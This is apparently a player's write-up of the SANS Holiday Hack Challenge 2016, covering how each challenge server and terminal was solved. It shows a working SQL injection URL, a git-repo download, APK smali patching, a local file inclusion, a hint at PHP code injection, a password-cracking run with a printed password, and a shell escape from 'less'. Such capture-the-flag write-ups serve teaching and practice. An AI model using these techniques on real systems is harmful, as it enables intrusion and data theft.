SANS HHC 2016 - Part 5: Discombobulated Audio

SANS Holiday Hack Challenge 2016

Part 5: Discombobulated Audio

I have all the auido files:

Server (northpolewonderland.com)	File Name	File Size (Bytes)	MD5 Hash
analytics	discombobulatedaudio2.mp3	223248	f05c1ec6c536e455ec686973fa6b8e20
dungeon	discombobulatedaudio3.mp3	202362	0be15d00299af1a6bc1d11ab6f2696a0
dev	debug-20161224235959-0.mp3	218033	0a5ef5d7a0e89658a833d1892a9e1ec6
ads	discombobulatedaudio5.mp3	233357	3d87c1d31717f81f1966db4133f9e24d
ex	discombobulated-audio-6-XyzE3N9YqKNH.mp3	223244	4ee86b5b0eef9f8815ee7446272a6c06
analytics	discombobulatedaudio7.mp3	220943	313e7e370fd7d5232bb569f21856d9f4

I used Audicity on my Windows 10 laptop to apply filters and effects to the MP3 files.

At first I thought each file contained a word to form a sentence, but making changes on each file didn’t help, it wasn’t possible to understand them all like that.

My friend, who works with audio and video editing, suggested putting them together one after the other, and I decided since I have 7 files, each 7 seconds long to change the tempo to 1 second each for a total of 7 seconds.

7 files changed to 1 sec Tempo per file in order

When I played the result it said

“Father Christmas, Santa Claus. Or, as I've always known him, Jeff.”

Which is a quote from Doctor Who: A Christmas Carol (2010)

That whole sentence was the passphrase for the last door without a terminal where I found The Doctor who confessed kidnapping Santa to use he’s powers for a greater good, removing the existence of the Star Wars Holiday Special from 1978.

9) Who is the villain behind the nefarious plot.

The Doctor. (wrongly called Dr. Who, unless there’s a legal copyright/trademark issue)

To be more precise, the fourth incarnation of The Doctor from the BBC TV Show Doctor Who (the scarf gave it away J)

10) Why had the villain abducted Santa?

The Doctor did it because he’s a mad man with a box and was trying to use Santa’s powerful North Pole Wonderland Magick to prevent the Star Wars Holiday Special from being EVER released because he visited a universe where 1978 didn’t have the SWHS and everyone was happy! J

SANS HHC 2016 - Part 4.3: My Gosh... It's Full of Holes - Analytics (post authentication)

SANS Holiday Hack Challenge 2016

Continuing Part 4: My Gosh... It's Full of Holes - Analytics (post authentication)

Nmap shows that a .git directory is available for download in https://analytics.northpolewonderland.com/.git

I get a copy of it with a 

wget -r https://analytics.northpolewonderland.com/.git/

cd analytics.northpolewonderland.com/

git status

git checkout for all the PHP source code

 And I look at the commit history and found interesting messages about the database dump sprusage.sql

git log interesting comments

I get an old version of the sprusage.sql file to find the administrator user and password

Old version of db dump has the administrator's password

From the commits messages I also noticed that it seems the application is storing SQL queries in the database.

The edit.php file has a warning about being experimental, this PHP file enables the user with access to change the values in the reports table, where the “query” field can be injected into the HTTP GET request and since it’s not sanitized before it’s stored in the reports table, it can be executed by the view.php if a correct id is entered.

edit.php WARNING!!

edit.php vulnerability

view.php executes the content of the "query"row from the reports table

administrator is a valid user account

The sprusage.sql shows that there’s an audio table that contains an mp3 file for each user id, this is where the getaudio.php get’s the mp3 files from, but only to the guest user is allowed to download this way, so it won’t work for the administrator user.

'audio' table contains mp3 blobs

First I need to login as administrator to create a report to obtain a report id.

Report created and got valid id to use in edit.php and view.php

 Then I can modify it with the edit.php using the id and add a new query to it.

Testing edit.php normal functionality

Result of edit.php shows query being exectuted

Here’s the URL with the SQL injection to list the content of the audio table. 

https://analytics.northpolewonderland.com/edit.php?id=700ff62d-cd01-4031-a52e-c6df60a0eb31&name=HACK&description=HACK+SQLI&query=SELECT%20*%20from%20audio

Result of edit.php with SQL injection adding the query field to list the content of the audio table

Using view.php and the report id it shows the file we want but the blob doesn't show

I use the edit.php to insert a new query that will return the content of the mp3 file in base64 format:

SELECT TO_BASE64(mp3) from audio where username=’administrator’

Use edit.php again to extract the mp3 blob to base64

And use the view.php with the id again to execute my new query, which shows the presence of another audio file in the audio table, so now it’s just a matter of running a query to extract the mp3 field in some text format.

I selected the base64 result and store it in my Kali linux to be decoded back to mp3 using the base64 command.

root@igor-kali:~/hhack2016/analytics.northpolewonderland.com# cat mp3.b64 |sed ‘s/ //g’ | base64 -d > discombobulatedaudio7.mp3

root@igor-kali:~/hhack2016/analytics.northpolewonderland.com# file discombobulatedaudio7.mp3

discombobulatedaudio7.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

Done!

We have all 7 MP3 files

SANS HHC 2016 - Part 4: My Gosh... It's Full of Holes - Dev / Ads / Ex

SANS Holiday Hack Challenge

Continuing with Part 4: My Gosh... It's Full of Holes

To continue examining and exploiting vulnerabilities was necessary to finish the environment.

Here you can find my setup

• The Debug Server

For this one, nmap only shows TCP port 80 and the content of the APK file shows an index.php URL.

Visiting the URL shows nothing, so we have to find out how the SantaGram app interact with it.

Time to use my emulator and BurpSuite to look at the traffic.

At first I didn’t see anything interacting with the debug server (dev.northpolewonderland.com), so debug mode must be disabled.

I look for debugging parameters in the APK file decoded by apktool.

Searching for Debug parameters

It seems the res/values/strings.xml file has the parameter we need to change and also need to interact with the EditProfile part of the app, but I changed the debug_data_enabled value to true, recompiled and signed as explained by Josh Wright here, and also here in this video, but no luck, editing the profile didn’t trigger any communication with the debug server.

So I went back and decided to attack the logic of the EditProfile.smali file, tracing the debug_data_enabled variable from the strings XML to the public XML I found an id=0x7f07001e.

Traced the variable 0c7f07001e - debug_data_enabled in EditProfile.smali

The code says that it’s compering v0 (from the strings.xml) with v3 (constant with value “true”). I decided just to change the const-string v3 value from “true” to “false”, in that way the default behavior will be to enable debug. Recompiled, resigned and push to my emulator again.

Debug enabled - Traffic going from SantaGram to Dev

Great, we have a connection and a JSON to play with as recommended by my greatest friend in the North Pole, Alabaster Snowball J

Alabaster talking about JSON parameters

Using BurpSuite repeater, we repeat the request and find that it response with exactly the same data plus an extra field called verbose that it’s set to false.

BurpSuite repeater showing verbose parameter

 I included that parameter in my request and set the value to true, this made the server return a list of files present in the same path as the index.php file, including the MP3 file.

JSON output with verbose=true shows MP3 file

root@igor-kali:~/hhack2016/dev.northpolewonderland.com# wget dev.northpolewonderland.com/debug-20161224235959-0.mp3

--2016-12-26 14:10:55--  http://dev.northpolewonderland.com/debug-20161224235959-0.mp3

Resolving dev.northpolewonderland.com (dev.northpolewonderland.com)... 35.184.63.245

Connecting to dev.northpolewonderland.com (dev.northpolewonderland.com)|35.184.63.245|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 218033 (213K) [audio/mpeg]

Saving to: ‘debug-20161224235959-0.mp3’

debug-20161224235959-0.mp3         100%[===================================>] 212.92K  --.-KB/s    in 0.1s   

2016-12-26 14:10:55 (1.54 MB/s) - ‘debug-20161224235959-0.mp3’ saved [218033/218033]

• The Banner Ad Server

And nmap scan shows that the server has TCP port 80 listening and accepting connection, and I point a web browser there and find the Ads banner server.

By the way, if you have an ad blocker, the site won’t display on your browser, disable it before proceeding.

I noticed a Login option in the top right corner, but also decided to look into the HTML source of the website for clues.

Ads main website

Ads HTML Source showing Meteor Framework

On the source code I saw that it was using the meteor framework that was mentioned by one of the elves.

 Pepper Minstix talks about Meteor

I read Tim Medin’s blog post from HackFest 2016 and installed Tampermonkey and his Meteor Miner script to start looking for subscriptions and collections.

This way I found an URL that didn’t have a link from the main website http://ads.northpolewonderland.com/admin/quotes

Spotted /admin/quotes with Meteor Miner

I looked at the collections and click on the HomeQuotes one to find 1 record with audio which is what I’m looking for.

HomeQuotes is showing an audio record 

I opened a Web Console and ran HomeQuotes.find().fetch() and it shows me an array of 5 objects, I clicked on the 5^th object and found the URL for the MP3 file, http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3

Web console - Result of HomeQuotes.find().fetch()

• The Uncaught Exception Handler Server

As I used the SantaGram app I noticed that it would crash every time I tried to use the Search option and scroll down the posts, and this will trigger a message to the http://ex.northpolewonderland.com/exception.php URL.

SantaGram Crashes in Search 

JSON Request to ex server

The respond to this JSON request was a JSON indicating the a crashdump PHP file was created in the docs directory.

crashdump php file created

Using BurpSuite repeater I made changes to the operation parameter to find a verbose message that gave me the only two options that were acceptable, WriteCrashDump and ReadCrashDump.

Exception JSON operations

I changed the operation to ReadCrashDump to see what else can I find out and it tells me that I need a crashdump key set in the JSON for it to work, so this means this can read the crashdump-XXXXX.php files it creates and I try that without all the other values and got an HTTP 500 errors that I can interpret as it tried to execute the PHP but failed.

ReadCrashDump needs crashdump JSON key

HTTP 500 trying to read a crashdump

This looks like a Local File Inclusion vulnerability that Sugarplum Mary talked about, and I managed to extract the source code of the exception.php file by using Jeff McJunkin’s blog post

Base64 Dump of the exception.php file

MP3 reference found in exception.php

The file can be downloaded from http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3

NOTE: If you noticed, the crashdump files are PHP and are executed by the server if you point a browser to it or curl it, it just prints back the data you sent to the exception.php. If you look at the code, you can inject your own PHP code to it, actually, other players used a print_r(scandir('..')) to list the files and found the MP3 instead of the base64 exfiltration. You can do more than that 😏

SANS HHC 2016 - Part 3: A Fresh-Baked Holiday Pi

SANS Holiday Hack Challenge 2016

Part 3: A Fresh-Baked Holiday Pi

Player Inventory - All pieces of the Cranberry Pi

After finding all the pieces of the Cranberry Pi computer Holly Evergreen provided a link to download the image file from the SD card.

What's the Cranberry Pi for?

Download the SD image

https://www.northpolewonderland.com/cranbian.img.zip

5) What is the password for the "cranpi" account on the Cranberry Pi system?

I went and talked to Wunorse Opensale, under the tree in the middle of the town, and he had a great tip for working with SD cards images.

How to manage SD images

Following the article, I was able to mount the SD image and looked for the /etc/shadow file

Another elf, Minty Candycane, had a tip about John the Ripper and what password database to use (Rockyou), and that’s what I used to crack the password in about 20 min while I walked through the park collecting NetWar coins J

root@igor-kali:/mnt/etc# john --wordlist=/usr/share/wordlists/rockyou.txt shadow

Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"

Use the "--format=crypt" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])

Press 'q' or Ctrl-C to abort, almost any other key for status

0g 0:00:00:16 0.04% (ETA: 07:35:40) 0g/s 389.0p/s 389.0c/s 389.0C/s bugger..marilu

0g 0:00:00:19 0.04% (ETA: 07:36:11) 0g/s 390.1p/s 390.1c/s 390.1C/s pheonix..Samantha

0g 0:00:05:20 0.69% (ETA: 08:09:37) 0g/s 369.2p/s 369.2c/s 369.2C/s digimate..death7

0g 0:00:12:41 1.74% (ETA: 07:25:29) 0g/s 385.5p/s 385.5c/s 385.5C/s serena5..selena9

yummycookies     (cranpi)

1g 0:00:19:23 DONE (2016-12-12 19:37) 0.000859g/s 390.5p/s 390.5c/s 390.5C/s yveth..yulyul

Use the "--show" option to display all of the cracked passwords reliably

6) How did you open each terminal door and where had the villain imprisoned Santa?

Itchy's /out.pcap file

I took the long way around to solve this one because I didn't check for a few basic things first, that's on me.

I will give you the quick answer instead of going through the process I went. At some point I will share my write up where you can find all the details.

The PCAP file is in read only mode for the itchy user, so we need some kind of privilege change mechanism to read it.

First check sudo permissions: 

SUDO Permissions (sudo -l)

So, scratchy, our username, can execute 2 commands as itchy tcpdump and string

We do a tcpdump first

Part 1 of the password

Now part two of the password required to use the string command, I know this because tcpdump shows a binary file was downloaded with HTTP.

strings ouput

This is not showing me much either, it's the same thing tcpdump showed me.

The file command is missing in this terminal, that would've help solve this quicker.

So playing with the strings command we found different options

$ strings --help

Usage: strings [option(s)] [file(s)]

 Display printable strings in [file(s)] (stdin by default)

 The options are:

  -a - --all                Scan the entire file, not just the data section [default]

  -d --data                 Only scan the data sections in the file

  -f --print-file-name      Print the name of the file before each string

  -n --bytes=[number]       Locate & print any NUL-terminated sequence of at

  -<number>                   least [number] characters (default 4).

  -t --radix={o,d,x}        Print the location of the string in base 8, 10 or 16

  -o                        An alias for --radix=o

  -T --target=<BFDNAME>     Specify the binary file format

  -e --encoding={s,S,b,l,B,L} Select character size and endianness:

                            s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit

  @<file>                   Read options from <file>

  -h --help                 Display this information

  -v -V --version           Print the program's version number

strings: supported targets: elf64-x86-64 elf32-i386 elf32-x86-64 a.out-i386-linux pei-i386 pei-x86-64 elf64-l1om elf64-k1om elf64-little elf64-big elf32-little elf32-big pe-x86-64 pe-i386 plugin srec symbolsrec verilog tekhex binary ihex

Report bugs to <http://www.sourceware.org/bugzilla/>

And the one that gave me the result was strings -e l to change the encoding to little-endian

Second half found

So the password is santaslittlehelper

I managed to make a copy of the pcacp file to my machine and this is what the file command returns

root@igor-kali:~/hhack2016# file out.pcap

out.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 262144)

The tcpdump file is in little-endian

The File Deep down

Ok, let's run a find . -type f

find deep down

I type the path wrong several times, and my find command kung fu is not as good, so I just decided to go all the way there….

Care for a ride?

Here we go…

elf@4f0fa5334794:~/.doormat/. $ ls

   bin  not_here

elf@4f0fa5334794:~/.doormat/. $ cd bin

elf@4f0fa5334794:~/.doormat/. /bin$ ls

elf@4f0fa5334794:~/.doormat/. /bin$ ls -al

total 8

drwxr-xr-x  2 root root 4096 Dec  6 19:39 .

drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..

elf@4f0fa5334794:~/.doormat/. /bin$ cd ..

elf@4f0fa5334794:~/.doormat/. $ cd not_here

elf@4f0fa5334794:~/.doormat/. /not_here$ ls -al

total 8

drwxr-xr-x  2 root root 4096 Dec  6 19:39 .

drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..

elf@4f0fa5334794:~/.doormat/. /not_here$ cd ..

elf@4f0fa5334794:~/.doormat/. $ l s-al

bash: l: command not found

elf@4f0fa5334794:~/.doormat/. $ ls -al

total 20

drwxr-xr-x 14 root root 4096 Dec  6 19:40 

drwxr-xr-x 16 root root 4096 Dec  6 19:40 .

drwxr-xr-x 18 root root 4096 Dec  6 19:40 ..

drwxr-xr-x  2 root root 4096 Dec  6 19:39 bin

drwxr-xr-x  2 root root 4096 Dec  6 19:39 not_here

elf@4f0fa5334794:~/.doormat/. $ cd \

elf@4f0fa5334794:~/.doormat/. / $ ls

\  opt  var

elf@4f0fa5334794:~/.doormat/. / $ ls -al

total 20

drwxr-xr-x 14 root root 4096 Dec  6 19:40 .

drwxr-xr-x 16 root root 4096 Dec  6 19:40 ..

drwxr-xr-x 12 root root 4096 Dec  6 19:40 \

drwxr-xr-x  2 root root 4096 Dec  6 19:40 opt

drwxr-xr-x  2 root root 4096 Dec  6 19:39 var

elf@4f0fa5334794:~/.doormat/. / $ cd \\

elf@4f0fa5334794:~/.doormat/. / /\$ ls

\\  ls  santa

elf@4f0fa5334794:~/.doormat/. / /\$ ls -al

total 20

drwxr-xr-x 12 root root 4096 Dec  6 19:40 .

drwxr-xr-x 14 root root 4096 Dec  6 19:40 ..

drwxr-xr-x 10 root root 4096 Dec  6 19:40 \\

drwxr-xr-x  2 root root 4096 Dec  6 19:40 ls

drwxr-xr-x  2 root root 4096 Dec  6 19:40 santa

elf@4f0fa5334794:~/.doormat/. / /\$ cd \\\

> \

> ^C

elf@4f0fa5334794:~/.doormat/. / /\$ cd \\\\

elf@4f0fa5334794:~/.doormat/. / /\/\\$ ls

Don't Look Here!  holiday  temp

elf@4f0fa5334794:~/.doormat/. / /\/\\$ cd Don\'t\ Look\ Here\!

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ ls -al

total 20

drwxr-xr-x  8 root root 4096 Dec  6 19:40 .

drwxr-xr-x 10 root root 4096 Dec  6 19:40 ..

drwxr-xr-x  6 root root 4096 Dec  6 19:40 You are persistent, aren't you?

drwxr-xr-x  2 root root 4096 Dec  6 19:40 files

drwxr-xr-x  2 root root 4096 Dec  6 19:40 secret

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd secret

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ ls

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ ls -al

total 8

drwxr-xr-x 2 root root 4096 Dec  6 19:40 .

drwxr-xr-x 8 root root 4096 Dec  6 19:40 ..

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/secret$ cd ..

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd You\ are\ persistent\,\ aren\`t\ you\?

bash: cd: You are persistent, aren`t you?: No such file or directory

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!$ cd You\ are\ persistent\,\ aren\'t\ you\?

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?$ ls -al

total 20

drwxr-xr-x 2 root root 4096 Dec  6 19:40 '

drwxr-xr-x 6 root root 4096 Dec  6 19:40 .

drwxr-xr-x 8 root root 4096 Dec  6 19:40 ..

drwxr-xr-x 2 root root 4096 Dec  6 19:40 cookbook

drwxr-xr-x 2 root root 4096 Dec  6 19:40 temp

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?$ cd \'

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'$ ls -al

total 12

drwxr-xr-x 2 root root 4096 Dec  6 19:40 .

drwxr-xr-x 6 root root 4096 Dec  6 19:40 ..

-rw-r--r-- 1 root root   17 Dec  6 19:39 key_for_the_door.txt

elf@4f0fa5334794:~/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'$ cat  key_for_the_door.txt

key: open_sesame

The Wumpus

I have no idea… but I killed the wumpus and got the passphrase

I saw the "or cheat;" and took that as a hint, since a ";" could be used for Command Injection in some cases.

I honestly was throwing random inputs to the actions as you can see in the screenshots, then I press Enter a bunch of times and decided to throw an arrow with "s1" and I killed the wumpus ¯\_(ツ)_/¯

Randomness!! 

Lucky shot?!

I had so many plans, I even encoded the binary in base64 and downloaded it to take a closer look, maybe disassemble or look for strings... Oh well!

War Games

 Found a video of the movie with the dialog, follow the dialog and don't make any “mistak”

 
Greetings Professor Falken

Playing Nuclear War

Look at the pretty lights

Time Traveling Train

I used the menu's BRAKEOFF option first in case I had to move the train (didn't have to), then I went to read the HELP, and I noticed it looked like it was using the 'less' command, so I tried using the feature to execute an external command and was able to get a BASH shell opened.

I found the ActivateTrain executable and ran it to traveled in time to 1978.

Less is more

Time Travel to 1978 Successful

 

1978!

With all the doors with terminal opened I found Santa in the DFER room of 1978

Santa found in DFER room of 1978